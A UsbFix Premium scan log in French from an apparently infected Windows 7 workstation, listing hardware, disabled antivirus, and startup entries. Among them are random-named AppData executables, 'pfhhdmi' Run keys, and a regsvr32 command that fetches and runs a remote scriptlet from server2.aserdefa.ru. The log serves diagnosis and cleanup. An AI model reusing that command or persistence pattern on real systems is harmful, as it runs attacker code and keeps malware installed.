############################## | UsbFix Premium V 10.006 | [Recherche] Utilisateur: poste11 (Administrateur) # POSTE11-PC Mis à jour le 06/01/2018 par SOSVirus Lancé à 11:05:54 | 15/01/2018 Site Web : https://www.usb-antivirus.com/fr/ https://www.usb-antivirus.com/fr/ Contact : https://www.usb-antivirus.com/fr/contact/ https://www.usb-antivirus.com/fr/contact/ ################## | System information | MB: MSI (G41M-P33 Combo(MS-7592)) CPU: Pentium(R) Dual-Core CPU E5700 @ 3.00GHz GC: Intel(R) G41 Express Chipset RAM -> [Total : 2013 Mo | Free : 342 Mo] Bios: American Megatrends Inc. Boot: Normal boot OS: Microsoft™ Windows 7 Ultimate (6.1.7601 32-Bit) Service Pack 1 WB: Internet Explorer : 8.00.7600.16385 WB: Google Chrome : 63.0.3239.132 WB: Mozilla Firefox : 57.0.4 WB: Opera : 50.0.2762.58 ################## | Security Information | AV: 360 Total Security [(!) Désactivé |A jour] AS: Windows Defender [Actif |(!) Non à jour] AS: 360 Total Security [(!) Désactivé |A jour] FW: Windows Firewall [Actif] SC: Security Center [Actif] WU: Windows Update [Actif] ################## | Disk Information | C:\ (%SystemDrive%) -> Disque fixe # 57 Go (5 Go libre(s) - 9%) [] # NTFS E:\ -> Disque fixe # 4 Go (4 Go libre(s) - 98%) [LILIA] # FAT32 ################## | Autorun | ################## | Recherche générique | Ignoré! E:\LILIA (4GB).lnk Ignoré! C:\Users\poste11\AppData\Roaming\eez135sfhU.exe Ignoré! C:\Users\poste11\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f.lnk Ignoré! C:\Users\poste11\AppData\Roaming\eemobdfSF2.exe Ignoré! C:\Users\poste11\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t.lnk Ignoré! HKCU\Software\Microsoft\Windows\CurrentVersion\Run,pfhhdmi Ignoré! HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run,pfhhdmi Ignoré! HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce,pfhhdmi Ignoré! HKU\360SandBox\Software\Microsoft\Windows\CurrentVersion\Run,pfhhdmi Ignoré! HKU\360SandBox\Software\Microsoft\Windows\CurrentVersion\RunOnce,pfhhdmi Ignoré! HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run,pfhhdmi Ignoré! HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\RunOnce,pfhhdmi Ignoré! HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run,pfhhdmi Ignoré! HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\RunOnce,pfhhdmi Ignoré! HKU\S-1-5-21-1469585373-830821537-676779224-1000\Software\Microsoft\Windows\CurrentVersion\Run,pfhhdmi Ignoré! HKU\S-1-5-21-1469585373-830821537-676779224-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce,pfhhdmi Ignoré! HKU\S-1-5-21-1469585373-830821537-676779224-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Run,pfhhdmi Ignoré! HKU\S-1-5-21-1469585373-830821537-676779224-1000_Classes\Software\Microsoft\Windows\CurrentVersion\RunOnce,pfhhdmi Ignoré! HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run,pfhhdmi Ignoré! HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce,pfhhdmi Ignoré! HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,pfhhdmi ################## | Regedit Run | F2 - HKLM\..\Winlogon : [Shell] explorer.exe F2 - HKLM\..\Winlogon : [Userinit] C:\Windows\system32\userinit.exe, 04 - HKCU\..\Run : [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe" 04 - HKCU\..\Run : [pfhhdmi] C:\Users\poste11\AppData\Roaming\Microsoft\bfrvvdui\wtacgjij.exe 04 - HKCU\..\Run : [COM+] regsvr32 /s /n /u /i:http://server2.aserdefa.ru/restore.xml scrobj.dll 04 - HKCU\..\Run : [GenieFloater] C:\Program Files\Genie Soft\Genie Cleaner\GenieFloater.exe 04 - HKCU\..\Policies\Explorer\run : [pfhhdmi] C:\Users\poste11\AppData\Roaming\Microsoft\bfrvvdui\wtacgjij.exe 04 - HKLM\..\Run : [IgfxTray] C:\Windows\system32\igfxtray.exe 04 - HKLM\..\Run : [HotKeysCmds] C:\Windows\system32\hkcmd.exe 04 - HKLM\..\Run : [Persistence] C:\Windows\system32\igfxpers.exe 04 - HKLM\..\Run : [NeroFilterCheck] C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe 04 - HKLM\..\Run : [QHSafeTray] "C:\Program Files\360\Total Security\safemon\QHSafeTray.exe" /start 04 - HKLM\..\Run : [Client] "C:\PROGRA~1\TinaSoft\EASYCA~1\client.exe" 04 - HKLM\..\Run : [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe -s 04 - HKLM\..\Run : [ControlCenter4] C:\Program Files\ControlCenter4\BrCcBoot.exe /autorun 04 - HKLM\..\Run : [BrStsMon00] C:\Program Files\Browny02\Brother\BrStMonW.exe /AUTORUN 04 - HKLM\..\Run : [BrHelp] C:\Program Files\Brother\Brother Help\BrotherHelp.exe /AUTORUN 04 - HKU\S-1-5-19\..\Run : [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun 04 - HKU\S-1-5-20\..\Run : [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun 04 - HKU\S-1-5-21-1469585373-830821537-676779224-1000\..\Run : [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe" 04 - HKU\S-1-5-21-1469585373-830821537-676779224-1000\..\Run : [pfhhdmi] C:\Users\poste11\AppData\Roaming\Microsoft\bfrvvdui\wtacgjij.exe 04 - HKU\S-1-5-21-1469585373-830821537-676779224-1000\..\Run : [COM+] regsvr32 /s /n /u /i:http://server2.aserdefa.ru/restore.xml scrobj.dll 04 - HKU\S-1-5-21-1469585373-830821537-676779224-1000\..\Run : [GenieFloater] C:\Program Files\Genie Soft\Genie Cleaner\GenieFloater.exe 04 - HKU\S-1-5-19\..\RunOnce : [mctadmin] C:\Windows\System32\mctadmin.exe 04 - HKU\S-1-5-20\..\RunOnce : [mctadmin] C:\Windows\System32\mctadmin.exe 04 - HKU\S-1-5-21-1469585373-830821537-676779224-1000\..\Policies\Explorer\run : [pfhhdmi] C:\Users\poste11\AppData\Roaming\Microsoft\bfrvvdui\wtacgjij.exe 04GS - F.lnk : C:\Users\poste11\AppData\Roaming\eez135sfhU.exe 04GS - T.lnk : C:\Users\poste11\AppData\Roaming\eemobdfSF2.exe 04GS - McAfee Security Scan Plus.lnk : C:\Program Files\McAfee Security Scan\3.11.599\SSScheduler.exe ################## | E.O.F |